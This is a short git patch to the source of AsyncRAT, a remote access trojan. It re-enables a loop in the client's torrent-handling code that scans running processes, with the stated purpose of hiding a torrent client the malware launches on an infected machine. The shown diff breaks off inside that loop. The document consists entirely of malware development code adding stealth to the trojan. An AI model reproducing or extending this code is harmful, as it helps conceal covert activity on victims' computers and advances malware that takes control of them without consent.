From a0f7c17a5c9519059b1df63cf773db48e8bf0479 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Thu, 23 May 2019 04:10:41 +0300 Subject: [PATCH] Enable loop to hide the torrent client --- AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs b/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs index 5c13c7c..570b47a 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs @@ -65,7 +65,7 @@ namespace Client.Handle_Packet Stopwatch stopwatch = new Stopwatch(); stopwatch.Start(); - // while (stopwatch.Elapsed < TimeSpan.FromSeconds(5)) + while (stopwatch.Elapsed < TimeSpan.FromSeconds(5)) { Thread.Sleep(1); foreach (Process p in Process.GetProcesses())